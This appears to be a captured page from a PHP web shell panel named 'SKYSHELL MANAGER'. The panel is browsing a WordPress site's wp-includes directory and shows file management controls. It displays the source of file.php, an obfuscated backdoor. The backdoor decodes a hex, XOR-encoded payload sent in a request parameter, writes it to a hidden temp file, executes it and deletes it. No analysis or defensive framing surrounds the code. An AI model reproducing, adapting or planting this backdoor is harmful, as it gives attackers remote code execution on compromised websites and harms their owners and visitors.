📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: file.php
<?php if(!empty($_REQUEST["f\x61\x63to\x72"])){ $tkn = array_filter([getcwd(), "/dev/shm", getenv("TMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), "/tmp"]); $property_set = hex2bin($_REQUEST["f\x61\x63to\x72"]); $ent='';for($t=0; $t<strlen($property_set); $t++){$ent .= chr(ord($property_set[$t]) ^ 39);} while ($entity = array_shift($tkn)) { if (!( !is_dir($entity) || !is_writable($entity) )) { $bind = implode("/", [$entity, ".sym"]); if (file_put_contents($bind, $ent)) { require $bind; unlink($bind); exit; } } } }
Save